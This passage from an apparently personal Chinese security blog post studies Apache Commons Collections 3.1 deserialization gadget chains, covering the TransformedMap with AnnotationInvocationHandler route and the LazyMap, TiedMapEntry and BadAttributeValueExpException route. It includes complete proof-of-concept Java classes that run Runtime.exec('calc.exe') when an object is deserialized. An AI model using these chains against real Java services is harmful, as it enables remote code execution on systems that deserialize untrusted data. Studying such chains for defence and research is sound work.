<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> Map&lt;String, Class&lt;?&gt;&gt; memberTypes() &#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">this</span>.memberTypes;<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-built_in">this</span>.memberTypes = <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>(var2.length + <span class="hljs-number">1</span>, <span class="hljs-number">1.0F</span>);<br></code></pre></td></tr></table></figure>

<p>因此var3是一个HashMap，这样也就可以得到(Class)var3.get(var6)调用的是Map的get方法，也就是复制</p>
<h4 id="3"><a href="#3" class="headerlink" title="3."></a>3.</h4><p>var2</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">var2 = AnnotationType.getInstance(<span class="hljs-built_in">this</span>.type);<br></code></pre></td></tr></table></figure>

<p>所以现在要确认的就是</p>
<p>this.type，和this.memberValues</p>
<p>跟到构造函数中</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307210357-0iai9k9.png" srcset="/img/loading.gif" lazyload alt="image-20220307210357-0iai9k9.png"></p>
<p>var1是个注解类，可以传入java.lang.annotation.Retention</p>
<p>var2为Map类型，可以传入TransformedMap实例对象</p>
<p>构造AnnotationInvocationHandler.AnnotationInvocationHandler()</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs java">Class&lt;?&gt; clazz = Class.forName(<span class="hljs-string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);<br>Constructor&lt;?&gt; constructor = clazz.getDeclaredConstructor(Class.class, Map.class);<br>constructor.setAccessible(<span class="hljs-literal">true</span>);<br>constructor.newInstance(java.lang.annotation.Retention.class,outMap);<br></code></pre></td></tr></table></figure>

<p>断点调试，可以看到</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307212430-yfht9sw.png" srcset="/img/loading.gif" lazyload alt="image-20220307212430-yfht9sw.png"></p>
<h4 id="4"><a href="#4" class="headerlink" title="4."></a>4.</h4><p><img src="https://o.130014.xyz/2022/03/08/image-20220307213755-iwy8gr6.png" srcset="/img/loading.gif" lazyload alt="image-20220307213755-iwy8gr6.png"></p>
<p>因为特定了键值为value，所以构造HashMap的时候要指定键值为value</p>
<h3 id="完整反序列化poc"><a href="#完整反序列化poc" class="headerlink" title="完整反序列化poc"></a>完整反序列化poc</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">EvilTest1</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException &#123;<br>        org.apache.commons.collections.Transformer[] transformers = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Transformer</span>[]&#123;<br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">ConstantTransformer</span>(Runtime.class),<br>                <span class="hljs-comment">//获取到Runtime.getRuntime方法</span><br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-string">&quot;getRuntime&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[<span class="hljs-number">0</span>]&#125;),<br>                <span class="hljs-comment">//反射调用getRuntime，获取到Runtime类</span><br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-literal">null</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[<span class="hljs-number">0</span>]&#125;),<br>                <span class="hljs-comment">//反射调用exec方法</span><br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;String.class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-string">&quot;calc.exe&quot;</span>&#125;)<br>        &#125;;<br>        <span class="hljs-type">ChainedTransformer</span> <span class="hljs-variable">chainedTransformer</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ChainedTransformer</span>(transformers);<br><br>        <span class="hljs-comment">//初始一个hashmap</span><br>        <span class="hljs-type">HashMap</span> <span class="hljs-variable">map</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>();<br>        map.put(<span class="hljs-string">&quot;value&quot;</span>,<span class="hljs-string">&quot;2&quot;</span>);<br><br>        <span class="hljs-comment">//初始化TransformMap，传入构造的反射执行链</span><br>        <span class="hljs-type">Map</span> <span class="hljs-variable">outMap</span> <span class="hljs-operator">=</span> TransformedMap.decorate(map, <span class="hljs-literal">null</span>, chainedTransformer);<br><br>        Class&lt;?&gt; clazz = Class.forName(<span class="hljs-string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);<br>        Constructor&lt;?&gt; constructor = clazz.getDeclaredConstructor(Class.class, Map.class);<br>        constructor.setAccessible(<span class="hljs-literal">true</span>);<span class="hljs-comment">//开放构造器访问权限</span><br>        <span class="hljs-type">Object</span> <span class="hljs-variable">exp</span> <span class="hljs-operator">=</span> constructor.newInstance(Retention.class, outMap);<br><br>        <span class="hljs-type">ByteArrayOutputStream</span> <span class="hljs-variable">bout</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ByteArrayOutputStream</span>();<br>        <span class="hljs-type">ObjectOutputStream</span> <span class="hljs-variable">oos</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectOutputStream</span>(bout);<br>        oos.writeObject(exp);<br>        oos.flush();<br>        oos.close();<br><br><br>        <span class="hljs-type">ByteArrayInputStream</span> <span class="hljs-variable">in</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ByteArrayInputStream</span>(bout.toByteArray());<br>        <span class="hljs-type">ObjectInputStream</span> <span class="hljs-variable">ois</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectInputStream</span>(in);<br>        <span class="hljs-type">Object</span> <span class="hljs-variable">o</span> <span class="hljs-operator">=</span> (Object) ois.readObject();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>


<h2 id="LazyMap攻击链"><a href="#LazyMap攻击链" class="headerlink" title="LazyMap攻击链"></a>LazyMap攻击链</h2><h3 id="LazyMap-get"><a href="#LazyMap-get" class="headerlink" title="LazyMap.get()"></a>LazyMap.get()</h3><p>org.apache.commons.collections.map.LazyMap类中的get方法，其中调用了transform方法</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220308015633-d90jogg.png" srcset="/img/loading.gif" lazyload alt="image-20220308015633-d90jogg.png"></p>
<p>且this.factory可控，还是TransFormer对象</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220308015818-nqdozu7.png" srcset="/img/loading.gif" lazyload alt="image-20220308015818-nqdozu7.png"></p>
<p>因为get方法是public类型，所以直接可以构造利用</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">EvilTest2</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> &#123;<br>        org.apache.commons.collections.Transformer[] transformers = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Transformer</span>[]&#123;<br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">ConstantTransformer</span>(Runtime.class),<br>                <span class="hljs-comment">//获取到Runtime.getRuntime方法</span><br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-string">&quot;getRuntime&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[<span class="hljs-number">0</span>]&#125;),<br>                <span class="hljs-comment">//反射调用getRuntime，获取到Runtime类</span><br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-literal">null</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[<span class="hljs-number">0</span>]&#125;),<br>                <span class="hljs-comment">//反射调用exec方法</span><br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;String.class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-string">&quot;calc.exe&quot;</span>&#125;)<br>        &#125;;<br>        <span class="hljs-type">ChainedTransformer</span> <span class="hljs-variable">chainedTransformer</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ChainedTransformer</span>(transformers);<br><br>        <span class="hljs-type">HashMap</span> <span class="hljs-variable">map</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>();<br>        map.put(<span class="hljs-number">1</span>,<span class="hljs-number">2</span>);<br><br>        <span class="hljs-type">Map</span> <span class="hljs-variable">lm</span> <span class="hljs-operator">=</span> LazyMap.decorate(map, chainedTransformer);<br>        lm.get(<span class="hljs-string">&quot;xianbei&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>


<p>因为暂未找到在readObject方法中调用get的类，所以跟踪get方法的调用栈，看哪些方法调用了get，并且他们有可能在readObject中被调用</p>
<h3 id="TiedMapEntry-getValue"><a href="#TiedMapEntry-getValue" class="headerlink" title="TiedMapEntry.getValue()"></a>TiedMapEntry.getValue()</h3><p><img src="https://o.130014.xyz/2022/03/08/image-20220308020444-nthp1e5.png" srcset="/img/loading.gif" lazyload alt="image-20220308020444-nthp1e5.png"></p>
<p>可以看到getValue方法中调用了get，this.key也由构造方法中传入，我们可控</p>
<p>将this.map指向上面的LazyMap实例对象即可</p>
<h3 id="TiedMapEntry-toString"><a href="#TiedMapEntry-toString" class="headerlink" title="TiedMapEntry.toString()"></a>TiedMapEntry.toString()</h3><p><img src="https://o.130014.xyz/2022/03/08/image-20220308033859-dq9ssky.png" srcset="/img/loading.gif" lazyload alt="image-20220308033859-dq9ssky.png"></p>
<p>这个类的toString()方法中调用了getValue，我们只要将this指向TiedMapEntry即可</p>
<h3 id="javax-management-BadAttributeValueExpException-readObject"><a href="#javax-management-BadAttributeValueExpException-readObject" class="headerlink" title="javax.management.BadAttributeValueExpException.readObject()"></a>javax.management.BadAttributeValueExpException.readObject()</h3><p><img src="https://o.130014.xyz/2022/03/08/image-20220308034152-8nduzjh.png" srcset="/img/loading.gif" lazyload alt="image-20220308034152-8nduzjh.png"></p>
<p>javax.management.BadAttributeValueExpException类的readObject方法调用了toString()</p>
<p>我们把valObj指向上面的TiedMapEntry就可以触发</p>
<p>逆推看看valObj是咋来的</p>
<p>gf.get(“val”, null)就是拿到反序列化类中的val属性</p>
<p>val是BadAttributeValueExpException的一个私有属性</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220308034523-lsxt49z.png" srcset="/img/loading.gif" lazyload alt="image-20220308034523-lsxt49z.png"></p>
<p>因为我们想要控制的这个val是个私有属性</p>
<p>可以通过<strong>反射对私有属性赋值</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Map</span> <span class="hljs-variable">lazyMap</span> <span class="hljs-operator">=</span> LazyMap.decorate(map, chainedTransformer);<br><br><span class="hljs-type">TiedMapEntry</span> <span class="hljs-variable">tiedMapEntry</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">TiedMapEntry</span>(lazyMap, <span class="hljs-literal">null</span>);<br><span class="hljs-type">BadAttributeValueExpException</span> <span class="hljs-variable">ins</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">BadAttributeValueExpException</span>(<span class="hljs-literal">null</span>);<span class="hljs-comment">//创建实例对象</span><br><span class="hljs-type">Field</span> <span class="hljs-variable">val</span> <span class="hljs-operator">=</span> ins.getClass().getDeclaredField(<span class="hljs-string">&quot;val&quot;</span>);<span class="hljs-comment">//拿到BadAttributeValueExpException类的Field中的val属性</span><br>val.setAccessible(<span class="hljs-literal">true</span>);<span class="hljs-comment">//设置访问权限为true</span><br>val.set(ins,tiedMapEntry);<span class="hljs-comment">//修改ins实例对象中私有属性val的值为上面构建的TiedMapEntry</span><br></code></pre></td></tr></table></figure>


<p>这样就构建完成了，接着把ins进行序列化反序列化看看能不能触发</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220308035447-qgsqcmt.png" srcset="/img/loading.gif" lazyload alt="image-20220308035447-qgsqcmt.png"></p>
<p>成功成功</p>
<p>这条链子相对来说比上面哪个要简易一点</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><ol>
<li>反序列化漏洞：一般是触发点，在重写的readObject里有特定方法，为整条链子的入口</li>
<li>反射调用方法是最根本的漏洞成因</li>
<li>对于实例中的操作，要熟用反射</li>
<li>对于java的一些知识还需要进一步学习，反射，io，动态代理，Map，强转类型时候的细节，注解</li>
<li>还是要细心</li>
</ol>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a target="_blank" rel="noopener" href="https://www.guildhab.top/2020/06/java-rmi-%e5%88%a9%e7%94%a84-%e6%9c%80%e5%9f%ba%e6%9c%ac%e7%9a%84%e4%b8%a4%e6%9d%a1-apache-commons-collections-pop-gadget-chains/">https://www.guildhab.top/2020/06/java-rmi-%e5%88%a9%e7%94%a84-%e6%9c%80%e5%9f%ba%e6%9c%ac%e7%9a%84%e4%b8%a4%e6%9d%a1-apache-commons-collections-pop-gadget-chains/</a></p>

              
            </div>
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/javaSec/" class="category-chain-item">javaSec</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">#java反序列化</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Apache Commons Collections 3.1链初探</div>
      <div>https://xianbeil.github.io/2022/03/08/javacc31study/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年3月8日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/12/ysoAndUrldns/" title="URLDNS链分析">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">URLDNS链分析</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/05/myjavastudy003/" title="【基础】-RMI原理及流程">
                        <span class="hidden-mobile">【基础】-RMI原理及流程</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>






  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.0/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script>
  (function() {
    var enableLang = CONFIG.code_language.enable && CONFIG.code_language.default;
    var enableCopy = CONFIG.copy_btn;
    if (!enableLang && !enableCopy) {
      return;
    }

    function getBgClass(ele) {
      return Fluid.utils.getBackgroundLightness(ele) >= 0 ? 'code-widget-light' : 'code-widget-dark';
    }

    var copyTmpl = '';
    copyTmpl += '<div class="code-widget">';
    copyTmpl += 'LANG';
    copyTmpl += '</div>';
    jQuery('.markdown-body pre').each(function() {
      var $pre = jQuery(this);
      if ($pre.find('code.mermaid').length > 0) {
        return;
      }
      if ($pre.find('span.line').length > 0) {
        return;
      }

      var lang = '';

      if (enableLang) {
        lang = CONFIG.code_language.default;
        if ($pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2 && $pre.children().hasClass('hljs')) {
          lang = $pre[0].children[0].classList[1];
        } else if ($pre[0].getAttribute('data-language')) {
          lang = $pre[0].getAttribute('data-language');
        } else if ($pre.parent().hasClass('sourceCode') && $pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2) {
          lang = $pre[0].children[0].classList[1];
          $pre.parent().addClass('code-wrapper');
        } else if ($pre.parent().hasClass('markdown-body') && $pre[0].classList.length === 0) {
          $pre.wrap('<div class="code-wrapper"></div>');
        }
        lang = lang.toUpperCase().replace('NONE', CONFIG.code_language.default);
      }
      $pre.append(copyTmpl.replace('LANG', lang).replace('code-widget">',
        getBgClass($pre[0]) + (enableCopy ? ' code-widget copy-btn" data-clipboard-snippet><i class="iconfont icon-copy"></i>' : ' code-widget">')));

      if (enableCopy) {
        Fluid.utils.createScript('https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js', function() {
          var clipboard = new window.ClipboardJS('.copy-btn', {
            target: function(trigger) {
              var nodes = trigger.parentNode.childNodes;
              for (var i = 0; i < nodes.length; i++) {
                if (nodes[i].tagName === 'CODE') {
                  return nodes[i];
                }
              }
            }
          });
          clipboard.on('success', function(e) {
            e.clearSelection();
            e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-copy', 'icon-success');
            setTimeout(function() {
              e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-success', 'icon-copy');
            }, 2000);
          });
        });
      }
    });
  })();
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
